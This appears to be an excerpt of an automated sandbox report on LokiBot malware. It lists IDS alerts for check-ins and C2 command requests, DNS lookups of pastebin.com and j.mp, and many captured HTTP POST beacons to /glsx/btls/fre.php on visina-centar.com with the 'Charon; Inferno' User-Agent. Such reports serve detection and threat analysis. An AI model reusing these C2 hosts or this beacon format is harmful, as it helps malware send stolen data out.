            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49263 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49263 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49263 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49263 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49264 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49264 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49264 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49264 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49265 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49265 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49265 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49265 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49266 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49266 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49266 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49266 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49267 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49267 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49267 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49267 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49268 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49268 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49268 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49268 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49269 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49269 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49269 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49269 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49270 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49270 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49270 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49270 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49272 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49272 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49272 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49272 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49273 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49273 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49273 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49273 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49274 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49274 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49274 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49274 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49275 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49275 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49275 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49275 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49276 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49276 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49276 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49276 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49277 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49277 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49277 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49277 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49278 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49278 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49278 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49278 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49279 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49279 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49279 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49279 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49280 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49280 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49280 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49280 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49281 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49281 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49281 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49281 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49282 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49282 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49282 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49282 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49283 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49283 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49283 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49283 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49284 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49284 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49284 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49284 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49285 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49285 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49285 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49285 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49286 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49286 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49286 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49286 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49287 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49287 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49287 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49287 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49288 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49288 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49288 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49288 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49289 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49289 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49289 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49289 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49290 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49290 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49290 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49290 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49291 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49291 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49291 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49291 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49292 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49292 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49292 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49292 -> 77.105.36.109:80
            Connects to a URL shortener serviceShow sources
            Source: unknownDNS query: name: j.mp
            Connects to a pastebin service (likely for C&C)Show sources
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: Joe Sandbox ViewDomain Name: j.mp j.mp
            Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
            Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
            Source: Joe Sandbox ViewIP Address: 67.199.248.17 67.199.248.17
            Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
            Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 174Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 174Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
